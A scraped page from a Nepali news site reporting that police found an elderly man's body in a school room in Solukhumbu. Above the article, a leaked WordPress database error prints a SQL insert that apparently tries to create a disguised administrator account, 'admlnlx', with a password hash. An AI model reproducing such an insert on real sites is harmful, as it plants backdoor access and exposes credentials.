WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BFwtChFd7Gu8JKodgGTGR7/63dZBhx.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-26 07:08:41', '', 'admlnlx', 'admlnlx')

सोलुखुम्बुमा विद्यालयको कोठामा एक बृद्धको शव फेला – Gaule Khabar

सोलुखुम्बुमा विद्यालयको कोठामा एक बृद्धको शव फेला

सोलुखुम्बुमा विद्यालयको कोठामा एक बृद्धको शव फेला

काठमाण्डौ । सोलुखुम्बु जिल्लामा एक बृद्धको शव विवारिसे अवस्थामा फेला परेको छ । लिखुपिके गाउँपालिका –३ का अन्दाजी ८० वर्षीय पर्मा शेर्पाको शव बेवारिसे अवस्थामा फेला परेको जिल्ला प्रहरी कार्यालय सोलुखुम्बुले जनाएको छ ।

शेर्पा आफ्नो घरमा नबसि सधै मागेर खादै हिडने गरेको थिए । विद्यालयको कोठामा शेर्पा मृत अवस्थामा फेला परेको प्रहरीले जनाएको छ । घटनाको सम्बन्धमा थप अनुसन्धान भइरहेको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका